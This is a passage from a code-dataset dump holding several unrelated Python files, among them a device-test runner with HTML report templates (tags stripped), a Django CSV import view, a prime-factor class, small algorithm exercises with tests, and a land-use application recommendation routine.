'Jerry')","sub_path":"친구와 친밀도 찾기.py","file_name":"친구와 친밀도 찾기.py","file_ext":"py","file_size_in_byte":1376,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"556089228","text":"__author__ = 'Sean Yu'\n'''created @2015/9/29''' \nimport unittest\nimport os\nimport sys\nimport re, datetime\npardir =os.path.dirname(os.path.realpath(os.getcwd()))\nsubfolder = ['lib', 'dut']\nfor sub in subfolder:\n libpath = os.path.sep.join([pardir,sub])\n if libpath not in sys.path:\n sys.path.insert(0,libpath)\nimport os\nfrom common import bench2dict\nimport pprint,traceback\nfor path in sys.path:\n pass\n #print(path)\ndef logAction(fun):\n def inner(*arg, **kwargs):\n try:\n msg ='Called function: %s'%(fun.__name__)\n #print(msg)\n response = fun(*arg, **kwargs)\n return response\n except Exception as e:\n arglist = list(arg)\n argstring =''\n import pprint as pp\n if type(arglist)==type([]):\n argstring = pp.pformat(arglist)\n else:\n argstring = arglist\n #for a in arglist:\n # argstring +='\\n\\t\\t'+str(a)\n kwargstring = ''\n kwargstring = pp.pformat(kwargs)\n #for k,v in kwargs:\n # kwargstring += '\\n\\t\\t%s: %s'%(str(k),str(v))\n #print('!!!ERROR!!!:\\n')\n #print(traceback.format_exc())\n msg ='*logAction dump:\\n\\tFunction Name: \\t\\t%s\\n\\tArguments: \\t\\t%s\\n\\tKeyword Arguments: \\t\\t%s'%(fun.__name__, argstring, kwargstring)\n from common import DumpStack\n msg =msg +'\\n-------------------------------------------------------------------------------'+DumpStack(e)\n msg = '\\n*********************************ERROR DUMP************************************\\n'+msg.replace('\\n', '\\n*')+'*********************************EREOR END*************************************\\n\\n'\n #print(msg)\n import os\n with open(os.getcwd()+'/error.txt','a+') as errorfile:\n errorfile.write(msg)\n raise e\n return inner\n return inner\n#@logAction\ndef createLogger(name, logpath='./'):\n #create a unique folder for case, and logfile for case\n if not os.path.exists(logpath):\n os.mkdir(logpath)\n import logging\n logfile = os.path.abspath(logpath)+\"/%s.log\"%(name)\n logger = logging.Logger(name,logging.DEBUG)\n hdrlog = logging.FileHandler(logfile)\n hdrlog .setFormatter(logging.Formatter('%(asctime)s -%(levelname)s: %(message)s'))\n logger.addHandler(hdrlog )\n return logger\nimport threading\ngPathLocker = threading.Lock()\ngShareDataLock= threading.Lock()\ngShareData={}\n#@logAction\ndef createLogDir(name,logpath='./', add_time=True):\n global gPathLocker\n gPathLocker.acquire()\n import os\n old_logpath=logpath\n def listDir(path):\n folders = []\n while 1:\n path, folder = os.path.split(path)\n\n if folder != \"\":\n folders.insert(0, folder)\n else:\n if path != \"\":\n folders.insert(0,path)\n break\n return folders\n old_cwd= os.getcwd()\n old_cwd = listDir(old_cwd)\n logpath = listDir(os.path.abspath(logpath))\n\n\n\n fullname = name[:60]\n removelist = '\\-_.'\n pat = r'[^\\w'+removelist+']'\n name = re.sub(pat, '', fullname)\n if add_time:\n tm = datetime.datetime.now().isoformat('_')\n tm = '-'+ re.sub(pat, '', tm)\n else:\n tm =''\n fullname = name+tm\n for dir in logpath:\n #print(os.getcwd())\n if os.path.exists(dir):\n #print(os.getcwd())\n os.chdir(dir)\n #print(os.getcwd())\n else:\n errormsg= 'dir: %s does not exist, please create it first'%dir\n for dir in old_cwd:\n os.chdir(dir)\n print(os.getcwd())\n print(errormsg)\n gPathLocker.release()\n raise Exception(errormsg)\n\n if not os.path.exists(fullname):\n #print(len(fullname))\n if len(fullname)>30:\n pass\n os.mkdir(fullname)\n logpath.append(fullname)\n #print(\"old_cwd:\",old_cwd)\n for dir in old_cwd:\n os.chdir(dir)\n #print(os.getcwd())\n gPathLocker.release()\n return old_logpath+'/'+fullname\n\n#@logAction\ndef openDutLogfile(duts, logpath, logger):\n for dut_name in duts.keys():\n duts[dut_name].openLogfile(logpath)\n logger.info(\"DUT %s redirected to case folder\"%dut_name)\n\n#@logAction\ndef initDUT(errormessage ,bench, dutnames, logger=None, casepath='./', shareData=None, dry_run =False):\n dictDUTs={}\n\n def connect2dut(InitErrorMessage , dutname, dut_attr, logger=None,path='./', shareData=None, dry_run =False):\n msg = ''\n try:\n import os\n if dut_attr[\"SUT\"].strip() =='':\n if os.name!='nt':\n raise ImportError('need implment default session for non-NT')#sutattr['SUT'] ='Session'\n else:\n dut_attr['SUT'] ='winTelnet'\n\n classname = dut_attr[\"SUT\"]\n #print(sys.path)\n ModuleName = __import__(classname)\n ClassName = ModuleName.__getattribute__(classname)\n\n ses= ClassName(dutname, dut_attr,logger=logger ,logpath = path, shareData = shareData)\n try:\n ses.dry_run = dry_run\n except Exception as e:\n msg ='%s not support dry_run'%(dutname)\n if logger is not None:\n logger.error(msg)\n else:\n print(msg)\n #ses.login()\n dictDUTs[dutname]=ses\n return ses\n except Exception as e:\n msg = '\\ncan\\'t init dut(%s)\\n%s\\n'%(dutname, e.__str__())\n for p in sorted (sys.path):\n print(p)\n if type(InitErrorMessage)==type(''):\n InitErrorMessage+=msg\n elif type(InitErrorMessage) ==type([]):\n InitErrorMessage.append(msg)\n else:\n InitErrorMessage=[msg]\n print(traceback.format_exc())\n raise e#ValueError(msg)\n import threading\n dutobjs=[]\n\n for dutname in dutnames:\n th = threading.Thread(target= connect2dut, args =[errormessage, dutname, bench[dutname],logger, casepath, shareData, dry_run])\n dutobjs.append(th)\n for th in dutobjs:\n th.start()\n\n for th in dutobjs:\n th.join()\n if len(errormessage)!=0 or (len(dictDUTs)!= len(dutnames)):\n if type(errormessage)==type([]):\n errormessage ='\\n\\t'.join(errormessage)\n raise Exception(errormessage)\n return dictDUTs\n\n\nCASE_MODE = set(['full', 'f',\n 'setup', 's',\n 'run', 'r',\n 'tear', 't', 'teardown',\n 'nosetup', 'ns',\n 'norun', 'nr',\n 'notear', 'noteardown', 'nt',\n ])\n#@logAction\ndef run(casename,duts, seqs ,mode, logger, sharedata):\n #print('initedduts 5')\n global CASE_MODE\n import datetime\n def analyzeStep(casename, dut, commnad, expect, wait):\n funName = dut.defaultFunction\n if mode not in CASE_MODE:\n raise ValueError('case mode is wrong, should be one of %s'%(str(CASE_MODE)))\n\n def runSegment( casename, mode, modeset, duts, seq, segName, logger):\n\n if mode in modeset:#{'full', 'setup', 'norun', 'notear', 's', 'nr', 'nt', 'f'}:\n segment=segName#'setup'\n stepindex= 1\n for dut, cmd,expect , due, lineno in seq:#self.seqSetup:\n\n session = duts[dut]\n stepinfo = \"\"\"\n###############################################################################\n# %s\n# Case: %s, LineNo:%d, %s.%d\n# DUT(%s) Action(%s),Exp(%s),Wait(%s)\n###############################################################################\n\"\"\"%(datetime.datetime.now().isoformat('_'),casename,lineno,segment, stepindex,\n dut,cmd, expect, due)\n session.info('segment', segment)\n session.info('LineNo', lineno)\n session.info('step Index', stepindex)\n session.info('dut', dut)\n session.info('action', cmd)\n session.info('EXPECT', expect)\n session.info('due', due)\n print(stepinfo)\n\n session.stepCheck(casename, lineno, cmd, expect, due)\n session.show()\n stepindex+=1\n\n\n modeset =[\n ['full', 'setup', 'norun', 'notear', 's', 'nr', 'nt', 'f'],\n ['full', 'run', 'nosetup', 'notear', 'r', 'ns', 'nt', 'f'],\n ['full', 'tear', 'norun', 'nosetup', 't', 'nr', 'ns', 'f']\n\n ]\n seqlist =[seqs[0],\n seqs[1],\n seqs[2]\n ]\n segNamelist =['setup', 'run', 'teardown']\n index = 0\n totalseg = len(seqlist)\n while index \n\nSuite Test Report %s\n\n\n%s\n\n\n\n
    Start TimeEnd TimeDuration(H:M:S)
    %s%s%s
    \n
    \n\n\n\n\n
    SUITE NAMEARGURMENTSCASE RANGE
    %s%s%s
    \n

    \n\n\n\n\n\n\n\n\n\n\n\n
    TOTAL CASEPASSFAILNOT RUN
    %d%d%d%d
    %s%s%s
    \n
    \n
    \n\n\"\"\"%(finish_status,finish_status, time.strftime('%Y-%m-%d:%H:%M:%S', time.localtime(suiteStartTime)), time.strftime('%Y-%m-%d:%H:%M:%S', time.localtime(suiteEndTime)),suit_duration_str,reportname, CaseRangeStr, ArgStr ,TOTAL, CASEPASS, CASEFAIL, CASENOTRUN, PPASS,PFAIL,PNOTRUN)\n\n response = response+ ''''''\n #NewRecord = [index,caseResult,caseline[2][1], errormessage,logdir, LineNo]\n for result in Report:\n index, caseResult, caseLine, errormessage, logdir, LineNo, ExecutionDuration, caseStartTime, caseEndTime =result\n caseStartTime =time.strftime('%Y-%m-%d:%H:%M:%S', time.localtime(caseStartTime))\n caseEndTime =time.strftime('%Y-%m-%d:%H:%M:%S', time.localtime(caseEndTime))\n if errormessage in ([] , None, ''):\n errormessage='-'\n if type(errormessage)==type([]):\n errormessage='
    '.join(errormessage)\n if type(errormessage)!=type(''):\n errormessage =pprint.pformat(errormessage)\n\n if errormessage:\n m = re.search('\\*ERROR MESSAGE:(.*?)\\*Traceback',errormessage,re.IGNORECASE|re.DOTALL)\n if m:\n errormessage=m.group(1).replace('*\\t','')\n errormessage = re.sub('\\'|\\\"', '', errormessage )\n errormessage= re.sub('\\\\\\\\n',' ', errormessage)\n errormessage= re.sub('\\\\\\\\r',' ', errormessage)\n errormessage= re.sub('\\\\\\\\t',' ', errormessage)\n errormessage= re.sub('\\r\\n',' ',errormessage)\n errormessage= re.sub('\\n|\\r',' ',errormessage)\n import unicodedata\n try:\n errormessage = unicode(errormessage, errors='ignore')\n errormessage =unicodedata.normalize('NFKD',errormessage ).encode('ascii','ignore')\n except TypeError:\n pass\n #errormessage= errormessage.decode().decode()\n max_length_of_error_message=100\n short_error= errormessage[:max_length_of_error_message]+'...' if len(errormessage)>max_length_of_error_message else errormessage[:max_length_of_error_message]\n bgcolor=\"#00FF00\"\n if caseResult=='FAIL':\n bgcolor = \"#FF0000\"\n\n response = response +\"\"\"\n \n \n \n \n \n \n \n \n \n\"\"\"%(index,bgcolor,logdir,caseResult,logdir,caseLine, ExecutionDuration,caseStartTime,caseEndTime, LineNo,errormessage, short_error)\n\n return response+\"\"\"
    No.ResultCase NameDuration(s)StartTimeEndTimeLine NoError Message
    %d%s%s%s%s%s%s%s
    \n
    \n
    \n\"\"\"\n\n","sub_path":"lib/runner.py","file_name":"runner.py","file_ext":"py","file_size_in_byte":27897,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"452628064","text":"from sys import exit\nX,Y,Z = [int(n) for n in input().split()]\n# N = int(input())\n# a = [int(input()) for _ in range(N)]\n# L = len(S)\n# T = str(input())\nans = 0\nb = max(Y,Z)\nwhile(X>b):\n ans+=1\n X-=Z\n X-=Y\nprint(ans-1 if X 1:\n model.write(sys.argv[1])\n","sub_path":"examples/delay/4hfspat_delay.py","file_name":"4hfspat_delay.py","file_ext":"py","file_size_in_byte":3885,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"428909835","text":"import csv\nimport os\n\nfrom django.shortcuts import render\nfrom bikelog.models import Journey\n\n\ndef list_csv(request):\n linelist = []\n csv_file = \"{0}/Dropbox/Apps/Drafts/bike-log.csv\".format(os.environ[\"HOME\"])\n fileinfo = os.stat(csv_file)\n if fileinfo.st_size != 0:\n no_journies = False\n no_journies_message = \"\"\n with open(csv_file, \"r\", encoding=\"UTF-8\") as f:\n reader = csv.reader(f)\n for line in reader:\n linelist.append(line)\n else:\n no_journies = True\n no_journies_message = \"There are no journies to import.\"\n \n # We want a different message asking us to import based on whether there is one or multiple journies\n if len(linelist) == 1:\n import_message = \"Do you want to import this journey?\"\n else:\n import_message = \"Do you want to import these journies?\"\n\n # Now we deliver the context variables to the render template\n context = {\n 'linelist': linelist,\n 'no_journies': no_journies,\n 'import_message': import_message,\n 'no_journies_message': no_journies_message\n }\n return render(request, 'import_journies.html', context)\n\n\ndef import_csv(request):\n csv_file = \"{0}/Dropbox/Apps/Drafts/bike-log.csv\".format(os.environ[\"HOME\"])\n with open(csv_file, \"r\", encoding=\"UTF-8\") as f:\n reader = csv.reader(f)\n for line in reader:\n journey = Journey(date=line[0], commute=line[1], distance=line[2], leg=line[3], notes=line[4])\n journey.save()\n with open(csv_file, \"w\", encoding=\"utf-8\") as f:\n f.seek(0)\n f.truncate()\n context = {\n 'success': \"Journies imported.\"\n }\n return render(request, 'imported.html', context)\n\n\n\n","sub_path":"bikelog/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1756,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"102220835","text":"# To change this license header, choose License Headers in Project Properties.\n# To change this template file, choose Tools | Templates\n# and open the template in the editor.\n\n__author__=\"Steven\"\n__date__ =\"$Jun 16, 2014 10:37:58 AM$\"\n\nimport math\nimport sys\n\n#========================================================================================\nclass Primes:\n 'Provides functionality for finding prime factors.'\n \n #======================================================================================\n def is_prime(self, aNum):\n 'Determine if a number is prime or not'\n retVal = True\n maxVal = math.floor( math.sqrt(aNum) )\n for i in range(2,maxVal+1):\n if (aNum % i == 0):\n retVal = False\n break\n\n return retVal\n \n #======================================================================================\n def get_all_factors_for(self, N):\n 'Find all the factors (not necessarily prime) of a given number N'\n myFactors = []\n maxVal = math.floor(N/2)\n for i in range(2,maxVal+1):\n if (N % i == 0):\n myFactors.append(i) \n\n return myFactors\n\n #======================================================================================\n def get_highest_prime_factor_for(self, N):\n 'Find highest prime factor of a number. If the number is prime it returns that number'\n highestPrimeFactor = N\n if not self.is_prime(N):\n maxVal = math.floor( N/2 )\n\n for i in range(maxVal,1,-1):\n if (N % i == 0) and (self.is_prime(i)):\n highestPrimeFactor = i\n break\n\n return highestPrimeFactor\n \n #=======================================================================================\n def get_prime_factors_for(self, myNum):\n 'Find the prime factors for a given number; e.g. Given 44 would return 2 2 11'\n factorList = []\n currentNum = myNum\n stillLooking = True\n while (stillLooking):\n highestPrime = self.get_highest_prime_factor_for(currentNum)\n \n if (currentNum > 2):\n factorList.append(highestPrime)\n currentNum = math.floor(currentNum/highestPrime)\n elif (currentNum == 2): #-- special edge case\n factorList.append(highestPrime)\n stillLooking = False\n else:\n stillLooking = False\n\n return sorted(factorList)\n\n \n#-- End Class Prime Factors --\n#========================================================================================\n\n#========================================================================================\nif __name__ == \"__main__\":\n \n pf = Primes()\n n = 1;\n userInput = input(\"Enter your name: \")\n print(\"Hello %s!\" % userInput)\n while (n != 0):\n n = input(\"Please enter an integer > 2 (0 to quit): \")\n n = int(n)\n if (n == 0):\n print(\"Goodbye!\")\n elif (n < 2):\n print(\"Input value out of range!\")\n n = 2\n else:\n print(\"Hello number: %s!\" % n)\n print(\"Your prime factors are: \")\n print(\"%s\" % pf.get_prime_factors_for(n))\n print(\"\")\n\n","sub_path":"Python/PrimeFactors/src/primefactors.py","file_name":"primefactors.py","file_ext":"py","file_size_in_byte":3000,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"86194730","text":"\"\"\"\nThere are 10 wizards, 0-9, you are given a list that each entry i is a list of \nwizards known by wizard i. Define the cost between wizards and wizard as square of \ndifferent of i and j. Find the min cost between given two wizards.\n\"\"\"\nimport heapq\ndef min_cost_wizards(relations, source, target):\n \"\"\"\n Use relations as the adjacent table and use a heap to maintain the min cost\n between two nodes.\n \"\"\"\n pq = []\n for neighbor in relations[source]:\n heapq.heappush(pq, ((source - neighbor) ** 2, neighbor, [source, neighbor]))\n \n while len(pq) > 0:\n cost, wizard, path = heapq.heappop(pq)\n if wizard == target:\n return path\n elif len(path) < 10: # length of path cannot exceed 10\n for neighbor in relations[wizard]:\n heapq.heappush(pq, (cost + (neighbor - wizard) ** 2, neighbor, path + [neighbor]))\n return [] # source cannot know target\n \n# test\nimport unittest\nclass Tester(unittest.TestCase):\n def test(self):\n relations1 = [\n [1,2], [3], [3,4], [4], []\n ]\n self.assertEqual([0, 1, 3, 4], min_cost_wizards(relations1, 0, 4))\n relations2 = [\n [1,2], [3], [3,4], [], [], [4], [], [], [], [] \n ]\n self.assertEqual([], min_cost_wizards(relations2, 0, 9))\n relations3 = [\n [1, 5, 9], [2, 3, 9], [4], [], [], [9], [], [], [], []\n ]\n self.assertEqual([0, 5, 9], min_cost_wizards(relations3, 0, 9))\n relations4 = [\n [1], [0], []\n ]\n self.assertEqual([], min_cost_wizards(relations4, 0, 2))\n \n \nunittest.main()\n","sub_path":"src/main/python/company/min_cost_wizards.py","file_name":"min_cost_wizards.py","file_ext":"py","file_size_in_byte":1655,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"41471618","text":"# coding: utf-8\nimport json\nimport chardet\n\n# strlist = '[1, 2, 3, 4]'\n# strdict = '{\"city\": \"shenzhen\", \"name\": \"amamam\"}'\n#\n# print(json.loads(strlist))\n# print(json.loads(strdict))\n\n\n# list = [1, 2, 3, 4]\n# tuple = (1, 2, 3, 4)\n# dict = {\"city\": \"北京\", \"name\": \"大猫\"}\n#\n# print(json.dumps(list))\n# print(json.dumps(tuple))\n# print(json.dumps(dict))\n# print(json.dumps(dict, ensure_ascii=False))\n#\n# print(chardet.detect(json.dumps(dict)))\n\n\nlist_str = [{\"city\": \"北京\", \"name\": \"大猫\"}]\njson.dump(list_str, open('file/list_str.json', 'w'), ensure_ascii=False)\n\ndictStr = {\"city\": \"北京\", \"name\": \"大刘\"}\njson.dump(dictStr, open('file/dictstr.json', 'w'), ensure_ascii=False)\n\n\nprint(json.load(open('file/list_str.json')))\nprint(json.load(open('file/dictstr.json')))\n","sub_path":"06/02/15_json.py","file_name":"15_json.py","file_ext":"py","file_size_in_byte":783,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"612405971","text":"from django.shortcuts import get_object_or_404\nfrom rest_framework import serializers\nfrom .. import models\nfrom datetime import date\nfrom users.models import User\n\n\nclass AddressSerializer(serializers.ModelSerializer):\n class Meta:\n model = models.Address\n fields = \"__all__\"\n\n\nclass SimplifiedCompanySerializer(serializers.ModelSerializer):\n advertising_this_year = serializers.IntegerField()\n\n class Meta:\n model = models.Company\n fields = (\n \"id\",\n \"ico\",\n \"name\",\n \"phone_number\",\n \"ad_volume\",\n \"status\",\n \"status_color\",\n \"contact_address\",\n \"billing_address\",\n \"contacts\",\n \"user\",\n \"orders\",\n \"events\",\n \"advertising_this_year\"\n )\n depth = 1\n\n def get_fields(self, *args, **kwargs):\n fields = super(SimplifiedCompanySerializer, self).get_fields(*args, **kwargs)\n request = self.context.get(\"request\", None)\n if request and getattr(request, \"method\", None) == \"PUT\":\n fields[\"ico\"].required = False\n fields[\"contact_address\"].required = False\n fields[\"billing_address\"].required = False\n fields[\"user\"].required = False\n\n if request and getattr(request, \"method\", None) in [\"PUT\", \"POST\"]:\n # remove non-model field\n fields[\"ico\"].required = False\n fields[\"notes\"].required = False\n fields[\"create_date\"].required = False\n fields[\"modification_date\"].required = False\n fields[\"status_modification_date\"].required = False\n fields[\"user\"].required = False\n del fields[\"advertising_this_year\"]\n return fields\n\n def create(self, validated_data: dict):\n\n request = self.context.get(\"request\", None)\n contact_address = None\n billing_address = None\n if \"contact_address\" in validated_data:\n contact_address = models.Address.objects.create(**validated_data.pop(\"contact_address\"))\n if \"billing_address\" in validated_data:\n billing_address = models.Address.objects.create(**validated_data.pop(\"billing_address\"))\n\n company = models.Company.objects.create(**validated_data)\n if \"status\" in validated_data or \"status_color\" in validated_data:\n company.status_modification_date = date.today()\n company.create_date = date.today()\n company.modification_date = date.today()\n company.contact_address = contact_address\n company.billing_address = billing_address\n company.user = request.user\n company.save()\n return company\n\n def update(self, company: models.Company, validated_data: dict):\n request = self.context.get(\"request\", None)\n if \"update_user\" in validated_data:\n update_user = validated_data.pop(\"update_user\")\n if update_user is True:\n company.user = request.user\n if \"user\" in validated_data:\n request_user = validated_data.pop(\"user\")\n if request_user is None:\n company.user = None\n else:\n user = get_object_or_404(User, email=request_user)\n company.user = user\n if \"status\" in validated_data or \"status_color\" in validated_data:\n company.status_modification_date = date.today()\n if \"contact_address\" in validated_data:\n contact_address_data = validated_data.pop(\"contact_address\")\n if company.contact_address:\n company.contact_address.update(contact_address_data)\n else:\n contact_address = models.Address.objects.create(**contact_address_data)\n company.contact_address = contact_address\n if \"billing_address\" in validated_data:\n billing_address_data = validated_data.pop(\"billing_address\")\n if company.billing_address:\n company.billing_address.update(billing_address_data)\n else:\n billing_address = models.Address.objects.create(**billing_address_data)\n company.billing_address = billing_address\n company.modification_date = date.today()\n company.update(validated_data)\n return company\n\n def validate(self, attrs):\n if \"ico\" in attrs and len(attrs[\"ico\"]) != 8:\n raise serializers.ValidationError({\"ico\": \"ico must have exactly 8 digits\"})\n return attrs\n\n\nclass CompanyNameSerializer(serializers.ModelSerializer):\n class Meta:\n model = models.Company\n fields = (\n \"id\",\n \"ico\",\n \"name\"\n )\n","sub_path":"backend/company/serializers/nested.py","file_name":"nested.py","file_ext":"py","file_size_in_byte":4736,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"367006667","text":"g = open(\"primes_new.txt\", \"r\")\n_ = g.read().split()\nprimes = [eval(i) for i in _]\ng.close()\n\nfrom math import sqrt\n\nlast = 496094177\n\nf = open(\"primes_new2.txt\", \"w\")\n\ndef is_prime(n):\n\t\n\tglobal primes, last\n\t#print(\"Testing {}\".format(n))\n\n\tfor k in range(last+1, int(sqrt(n))+1):\n\t\tif is_prime(k):\n\t\t\tpass\n\n\tfor p in primes:\n\t\tif p ** 2 > n:\n\t\t\tbreak\n\t\telif n % p == 0:\n\t\t\treturn False\n\n\tif last < n:\n\t\tlast = n\n\t\tprimes.append(n)\n\t#print('Testing {0}'.format(n, last))\n\t\tf.write(str(n))\n\t\tf.write(\"\\n\")\n\treturn True\t\n\n\n\nrate = [4553, 44545]\nnums = [496086529]\nlength = 22273\n\nwhile rate[0] * 10 >= rate[1]:\n\tlength += 1\n\tfor i in range(4):\n\t\tnew = nums[-1] + length\n\t\tnums.append(new)\n\t\tif is_prime(new):\n\t\t\trate[0] += 1\n\trate[1] += 4\n\tlength += 1\n\tprint(\"Length: {0}, Rate: {1}/{2}, Last Number: {3}\".format(length, rate[0], rate[1], nums[-1]))\n\nprint(length)\n#print(primes)\n#print(nums)\nf.close()","sub_path":"resource/code-samples/project-euler/0520P58.py","file_name":"0520P58.py","file_ext":"py","file_size_in_byte":902,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"635665601","text":"from .models import (\n CAUVApp,\n AG_LAND,\n)\n\n\n\ndef recommendation(app_select, AG_LAND_parcel, AG_LAND_land, errors):\n # BASE DATA MODEL FOR RECOMMENDED VALUES\n recommendation_values = {\n 'Commodity_Acres': app_select.Commodity_Acres,\n 'Hay_Acres': app_select.Hay_Acres,\n 'Perm_Pasture_Acres': app_select.Perm_Pasture_Acres,\n 'Noncommercial_Wood_Acres': app_select.Noncommercial_Wood_Acres,\n 'Commerical_Wood_Acres': app_select.Commerical_Wood_Acres,\n 'Other_Crop_Acres': app_select.Other_Crop_Acres,\n 'Homesite_Acres': app_select.Homesite_Acres,\n 'Road_Waste_Pond_Acres': app_select.Road_Waste_Pond_Acres,\n 'CRP_Acres': app_select.CRP_Acres,\n 'Con25_Acres': app_select.Con25_Acres,\n 'Other_Use_Acres': app_select.Other_Use_Acres,\n 'Stated_Total_Acres': app_select.Stated_Total_Acres,\n 'Gross_Income_1': app_select.Gross_Income_1,\n 'Gross_Income_2': app_select.Gross_Income_2,\n 'Gross_Income_3': app_select.Gross_Income_3,\n }\n # ADJUST HOME, CONP, CON25 IF NECESSARY\n temp_adjust = {\n 'Commodity_Acres': app_select.Commodity_Acres,\n 'Hay_Acres': app_select.Hay_Acres,\n 'Perm_Pasture_Acres': app_select.Perm_Pasture_Acres,\n 'Noncommercial_Wood_Acres': app_select.Noncommercial_Wood_Acres,\n 'Commerical_Wood_Acres': app_select.Commerical_Wood_Acres,\n 'Homesite_Acres': app_select.Homesite_Acres,\n 'Other_Crop_Acres': app_select.Other_Crop_Acres,\n 'Road_Waste_Pond_Acres': app_select.Road_Waste_Pond_Acres,\n 'CRP_Acres': app_select.CRP_Acres,\n 'Con25_Acres': app_select.Con25_Acres,\n }\n # FIRST ADJUST HOME, CRP, CON25\n road_final = []\n for each in AG_LAND_land:\n if len(errors) == 0:\n continue\n else:\n if each['LAND_USE_TYPE'] == 'HOME':\n temp_adjust['Homesite_Acres'] = each['LAND_USE_ACRES']\n\n elif each['LAND_USE_TYPE'] == 'CONP':\n temp_adjust['CRP_Acres'] = each['LAND_USE_ACRES']\n\n elif each['LAND_USE_TYPE'] == 'CON25':\n temp_adjust['Con25_Acres'] = each['LAND_USE_ACRES']\n\n elif each['LAND_USE_TYPE'] == 'CROP':\n adjust = (\n each['LAND_USE_ACRES'] -\n app_select.Hay_Acres -\n app_select.Perm_Pasture_Acres -\n app_select.Other_Crop_Acres -\n app_select.Other_Use_Acres\n )\n if adjust < 0:\n temp_adjust['Commodity_Acres'] = 0\n hay_adjust = app_select.Hay_Acres + adjust\n if hay_adjust < 0:\n temp_adjust['Hay_Acres'] = 0\n perm_pasture_adjust = app_select.Perm_Pasture_Acres + adjust\n if perm_pasture_adjust < 0:\n temp_adjust['Perm_Pasture_Acres'] = 0\n other_crop_adjust = app_select.Other_Crop_Acres + adjust\n if other_crop_adjust < 0:\n temp_adjust['Other_Crop_Acres'] = 0\n other_use_adjust = app_select.Other_Use_Acres + adjust\n if other_use_adjust <0:\n temp_adjust['Other_Use_Acres'] = 0\n else:\n temp_adjust['Other_Use_Acres'] = other_use_adjust\n else:\n temp_adjust['Other_Crop_Acres'] = other_crop_adjust\n else:\n temp_adjust['Perm_Pasture_Acres'] = perm_pasture_adjust\n else:\n temp_adjust['Hay_Acres'] = hay_adjust\n else:\n temp_adjust['Commodity_Acres'] = adjust\n\n elif each['LAND_USE_TYPE'] == 'WOOD':\n adjust = (\n each['LAND_USE_ACRES'] -\n app_select.Commerical_Wood_Acres\n )\n if adjust < 0:\n temp_adjust['Noncommercial_Wood_Acres'] = 0\n commercial_adjust = app_select.Commerical_Wood_Acres + adjust\n if commercial_adjust < 0:\n temp_adjust['Commerical_Wood_Acres'] = 0\n else:\n temp_adjust['Commerical_Wood_Acres'] = commercial_adjust\n else:\n temp_adjust['Noncommercial_Wood_Acres'] = adjust\n\n elif each['LAND_USE_TYPE'] == 'ROW':\n road_final.append(each['LAND_USE_ACRES'])\n\n elif each['LAND_USE_TYPE'] == 'DTCH':\n road_final.append(each['LAND_USE_ACRES'])\n\n elif each['LAND_USE_TYPE'] == 'WSTE':\n road_final.append(each['LAND_USE_ACRES'])\n\n else:\n pass\n\n temp_adjust['Road_Waste_Pond_Acres'] = round(sum(road_final),3)\n\n # double check there should be no values if not in ag_land\n all_land_types = []\n for each in AG_LAND_land:\n all_land_types.append(each['LAND_USE_TYPE'])\n if 'HOME' not in all_land_types:\n temp_adjust['Homesite_Acres'] = 0\n if 'CONP' not in all_land_types:\n temp_adjust['CRP_Acres'] = 0\n if 'CON25' not in all_land_types:\n temp_adjust['Con25_Acres'] = 0\n\n recommendation_values['Commodity_Acres'] = temp_adjust['Commodity_Acres']\n recommendation_values['Hay_Acres'] = temp_adjust['Hay_Acres']\n recommendation_values['Perm_Pasture_Acres'] = temp_adjust['Perm_Pasture_Acres']\n recommendation_values['Noncommercial_Wood_Acres'] = temp_adjust['Noncommercial_Wood_Acres']\n recommendation_values['Commerical_Wood_Acres'] = temp_adjust['Commerical_Wood_Acres']\n recommendation_values['Other_Crop_Acres'] = temp_adjust['Other_Crop_Acres']\n recommendation_values['Road_Waste_Pond_Acres'] = temp_adjust['Road_Waste_Pond_Acres']\n recommendation_values['Homesite_Acres'] = temp_adjust['Homesite_Acres']\n recommendation_values['CRP_Acres'] = temp_adjust['CRP_Acres']\n recommendation_values['Con25_Acres'] = temp_adjust['Con25_Acres']\n return recommendation_values\n\n\ndef recommendation_sum(recommendation_values):\n app_select = recommendation_values\n app_sum = [\n app_select['Commodity_Acres'],\n app_select['Hay_Acres'],\n app_select['Noncommercial_Wood_Acres'],\n app_select['Perm_Pasture_Acres'],\n app_select['Commerical_Wood_Acres'],\n app_select['Other_Crop_Acres'],\n app_select['Homesite_Acres'],\n app_select['Road_Waste_Pond_Acres'],\n app_select['CRP_Acres'],\n app_select['Con25_Acres'],\n app_select['Other_Use_Acres'],\n ]\n return round(sum(app_sum),3)\n","sub_path":"application/RECOMMENDATION.py","file_name":"RECOMMENDATION.py","file_ext":"py","file_size_in_byte":6909,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"633269259","text":"# Date: February 4, 2020 (TUE)\n# Link: https://leetcode.com/problems/rotate-array/\n\n\ndef rotate(nums, k):\n tmp_arr = [None] * len(nums)\n for i in range(len(nums)):\n tmp_arr[(i+k) % len(nums)] = nums[i]\n\n for j in range(len(nums)):\n nums[j] = tmp_arr[j]\n print(nums)\n return\n\n\ndef run():\n arr1 = [1, 2, 3, 4, 5, 6, 7]\n i = 3\n rotate(arr1, i)\n\n arr2 = [1, 2]\n j = 1\n rotate(arr2, j)\n return\n\n\nif __name__ == '__main__':\n run()\n","sub_path":"rotate_array.py","file_name":"rotate_array.py","file_ext":"py","file_size_in_byte":478,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"266083708","text":"import sys\nsys.path.append(\"..\")\nfrom timeit import default_timer as clock\nfrom symengine import var, Integer\n\ndef fact(n):\n if n in [0, 1]:\n return 1\n else:\n return n*fact(n-1)\n\ndef diff(e, x, n):\n for i in range(n):\n e = e.diff(x)\n return e\n\ndef legendre(n, x):\n e = 